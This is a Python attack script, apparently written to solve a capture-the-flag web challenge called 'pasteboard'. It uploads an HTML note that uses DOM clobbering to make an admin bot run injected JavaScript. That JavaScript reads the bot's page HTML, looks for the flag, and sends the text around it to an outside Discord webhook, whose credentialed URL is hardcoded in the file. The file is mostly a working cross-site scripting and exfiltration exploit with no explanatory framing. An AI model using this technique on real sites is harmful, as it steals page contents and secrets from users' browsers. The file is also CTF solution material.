import requests
import time

REMOTE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1459424345695715369/Gnx874Rcb7-ZXqQ6VDy-M_nSB-Su9R8KHIkcyj890gv1e60djv89CJbCkyRi-QPc-HvH"

# CLEAN test - payload has NO 'uoftctf' in it
payload = """
setTimeout(() => {
  const html = document.documentElement.outerHTML;
  const testString = 'uoft' + 'ctf';  // Avoid putting it in our payload
  const contains = html.toLowerCase().includes(testString);
  
  let context = 'NOT FOUND';
  if (contains) {
    const idx = html.toLowerCase().indexOf(testString);
    context = html.substring(Math.max(0, idx-100), idx+150);
  }
  
  fetch('WEBHOOK', {
    method: 'POST',
    headers: {'Content-Type':'application/json'},
    body: JSON.stringify({
      content: `Contains: ${contains}\\nHTML length: ${html.length}\\nContext: ${context}`
    })
  });
}, 2000);
""".replace('WEBHOOK', DISCORD_WEBHOOK)

html_content = f"""
<form id="errorReporter">
  <input name="path" value="data:text/javascript,{payload}" />
</form>
<img id="renderConfig" src="x" onerror="window.lastRenderError='x';throw new Error()" />
"""

print("[*] Creating CLEAN test (no 'uoftctf' in payload)...")
resp = requests.post(f"{REMOTE_URL}/note/new", data={"body": html_content}, allow_redirects=False)
if resp.status_code == 302:
    note_url = resp.headers['Location']
    print(f"[+] Paste created: {REMOTE_URL}{note_url}")
    
    print("[*] Reporting to bot...")
    report_resp = requests.post(f"{REMOTE_URL}/report", data={"url": note_url})
    print(f"[+] Reported! Check Discord in 30-35 seconds")
    print(f"[*] If this says 'Contains: true', the flag IS in the page")
    print(f"[*] If this says 'Contains: false', our previous test was wrong")
else:
    print(f"[-] Failed: {resp.status_code}")